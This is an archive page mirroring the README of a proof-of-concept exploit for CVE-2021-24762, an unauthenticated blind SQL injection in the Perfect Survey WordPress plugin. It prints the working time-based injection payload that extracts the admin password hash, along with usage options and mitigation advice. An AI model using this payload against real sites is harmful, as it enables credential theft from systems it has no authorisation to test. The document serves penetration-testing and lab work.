Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2021-24762 PoC — Perfect Survey < 1.5.2 - Unauthenticated SQL Injection

Source
https://github.com/c4cnm/Exploit_CVE-2021-24762
Associated Vulnerability
Title:Perfect Survey < 1.5.2 - Unauthenticated SQL Injection (CVE-2021-24762)
Description:The Perfect Survey WordPress plugin before 1.5.2 does not validate and escape the question_id GET parameter before using it in a SQL statement in the get_question AJAX action, allowing unauthenticated users to perform SQL injection.
Description
This repo shows an exploit to CVE-2021-24762. This is an Blind SQLi exploit that, on default config, greps the admin password.
Readme
# exploit_cve-2021-24762
This repo shows an exploit to CVE-2021-24762. This is an Blind SQLi exploit that, on default config, greps the admin password.
> While doing a lab, based on Wordpress with PerfectSurvey plugin, I stucked on a sql vulnerability. The only available PoC I found were based on sqlmap and wasn't working properly in the lab I was working on (There were a lot of additional questions, e.g. application returning 404, timeouts varying too much, and other issues. So I created this to exploit the lab.

## Goals
- This PoC exploits CVE-2021-24762, which is related to Wordpress plugin Perfect Survey. 
The exploit is based in SQL Injection with SLEEP, and it obtains the password hash from the 'admin' user. This user is default on Wordpress environments
- Where it works: Perfect Survey plugin running versions < 1.5.2.

## Impact and Severity
- CVE-2021-24762: [CVSS 9.8 (Crítica)]
- Impacts: confidenciality, integrity, availability, unauthorized access.

## Environment 
- Software requirements: Python3.

## How to use
```
 ____     _      ___   ____
 / ___|   / \    |_ _| / ___|
| |      / _ \    | |  \___ \
| |___  / ___ \   | |   __ ) |
 \____|/_/   \_\ |___| |____/

   CAIS - Inteligência em Cibersegurança
   Exploit for: CVE-2021-24762

usage: exploit_cve-2021-24762.py [-h] [-u URL] [-p PATH] [-d DELAY] [-t TIMEOUT] [-c CHARSET] [-m MAX_LEN] [-v]

Safe CLI wrapper — receives url/path/delay/timeout/charset and forwards it

options:
  -h, --help            show this help message and exit
  -u, --url URL         Base URL (default: http://192.168.10.10)
  -p, --path PATH       path (default: /wp-admin/admin-ajax.php)
  -d, --delay DELAY     delay in seconds (default: 30)
  -t, --timeout TIMEOUT
                        timeout in seconds (default: delay + 15)
  -c, --charset CHARSET
                        charset to be used (default: alnum + ./$_-@)
  -m, --max-len MAX_LEN
                        maximum length (default: 20)
  -v, --verbose         activates log debugging
```



1. Python script python receives the above parameters. In case they are not passed, script executes with its default values. 
2. Ideally, you'll need to pass at least the URL. Do it with -u or --url. Other parameters problably will work with defaults.
3. In default config, it will get the password hash from user admin. This config is applyed in payload variable, in the value of user_login:
`payload = f"1 AND (SELECT COUNT(*) FROM (SELECT 1 WHERE ORD(SUBSTRING((SELECT user_pass FROM wp_users WHERE user_login=0x61646d696e),{position},1))={ascii_code} AND SLEEP({delay})) AS a)"`

    In case you need to find the hash for other user, change "0x61646d696e" (admin) according to your needs.

## Risks and limitations
- Limitation: In the actual config, this PoC only obtains hash for passwords in wordpress with the default database structures. If you face some modified environment, then you need to change this payload:
    `payload = f"1 AND (SELECT COUNT(*) FROM (SELECT 1 WHERE ORD(SUBSTRING((SELECT user_pass FROM wp_users WHERE user_login=0x61646d696e),{position},1))={ascii_code} AND SLEEP({delay})) AS a)"`

## Mitigation and remediation (recommendations)
- Mitigation recommendations: Update plugin to version 1.5.2 and above.
- References: 
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24762
    - https://www.getperfectsurvey.com/ 


## Warning and authorizations
**Restricted use** — This repo contains sensitive content destinated to ethical and responsible use only.
Remember that you must have writing permission from the owner of the system you are testing on. Any use out of this scope is not allowed and will be charged on you(Do you want to go to jail?).


## Repo structure
- `exploit_cve-2021-24762` — Exploit.
- `README.ME` — This file.

## Changelog
`2025-10-10 — c4cnm — Creation and initial modifications`


## Contact
- Author: Red Team CAIS:/Matheus Camargo (c4cnm), matheus.camargo@rnp.br.



## License
`GNU General Public License v3 (GPL)`
File Snapshot

 [4.0K]  /data/pocs/b24405bebca539ee5e077e59d8a43d1716bbc0e4
├── [6.4K]  exploit_cve-2021-24762.py
├── [ 34K]  LICENSE
└── [3.9K]  README.md

1 directory, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →